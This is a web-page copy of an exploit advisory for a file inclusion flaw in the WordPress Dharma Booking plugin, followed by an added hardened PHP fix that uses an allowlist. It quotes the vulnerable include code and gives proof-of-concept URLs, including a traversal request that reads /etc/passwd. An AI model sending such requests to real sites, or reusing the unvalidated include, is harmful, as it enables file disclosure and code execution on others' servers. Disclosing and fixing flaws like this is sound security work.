Posted on 30 November -0001
<HTML><HEAD><TITLE>WordPress Dharma Booking 2.28.3 Remote / Local File Inclusion</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>
<pre>
# Exploit Title: WordPress Dharma Booking File Inclusion
# Date: 03/22/2016
# Exploit Author: AMAR^SHG
# Vendor Homepage: https://wordpress.org/plugins/dharma-booking/
# Software Link: https://wordpress.org/plugins/dharma-booking/
# Version: <=2.28.3
# Tested on: WINDOWS/WAMP

dharma-booking/frontend/ajax/gateways/proccess.php's code:

<?php
include_once('../../../../../../wp-config.php');
$settings = get_option('Dharma_Vars');
echo $settings['paymentAccount'] . $settings['gatewayid'];
// $_GET['gateway'] is used as an include path with no validation at all,
// so the request decides which file (local or remote) gets executed.
require_once($_GET['gateway'] . '.php');

// POC:
http://localhost/wp/dharma-booking/frontend/ajax/gateways/proccess.php?gateway=LFI/RFI
http://localhost/wp/dharma-booking/frontend/ajax/gateways/proccess.php?gateway=../../../../../../etc/passwd%00
</pre>
</BODY></HTML>
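The root cause above is that a request parameter is used directly as an include path. A hardened version of the gateway include, added here as an example (not code from the plugin or its author), maps a short identifier to a fixed allowlist of modules instead; the module names `paypal` and `stripe` are assumed for illustration.

```php
<?php
// Hardened gateway include (added example, not the plugin's own code).
// The vulnerable original built the include path from $_GET['gateway'] without
// validation. Fix: user input never names a file; it selects an entry from a
// fixed allowlist, and the resolved path is confirmed to stay inside this dir.

const GATEWAY_DIR = __DIR__;          // directory holding the gateway modules
const ALLOWED_GATEWAYS = [            // assumed module names, for illustration
    'paypal' => 'paypal.php',
    'stripe' => 'stripe.php',
];

/**
 * Resolve a user-supplied gateway identifier to a file inside GATEWAY_DIR.
 * Returns the absolute path, or null if the identifier is not allowed.
 */
function resolve_gateway(string $requested): ?string
{
    // Only a short lowercase token is accepted. This rejects "../", "/",
    // null bytes (%00), stream wrappers such as php:// and full URLs outright.
    if (!preg_match('/^[a-z0-9_]{1,32}$/', $requested)) {
        return null;
    }
    if (!array_key_exists($requested, ALLOWED_GATEWAYS)) {
        return null;
    }
    $base = realpath(GATEWAY_DIR);
    $path = realpath(GATEWAY_DIR . DIRECTORY_SEPARATOR . ALLOWED_GATEWAYS[$requested]);
    // realpath() follows symlinks; verify the result is still under GATEWAY_DIR.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$gateway = resolve_gateway((string) ($_GET['gateway'] ?? ''));
if ($gateway === null) {
    // Unknown or malformed identifier: refuse the request, do not fall back
    // to any include built from the raw input.
    http_response_code(400);
    exit('unknown gateway');
}
require_once $gateway;
```

A request such as `?gateway=../../../../../../etc/passwd%00` now fails the token check before any filesystem call is made, so the traversal and null-byte tricks in the PoC never reach `require_once`.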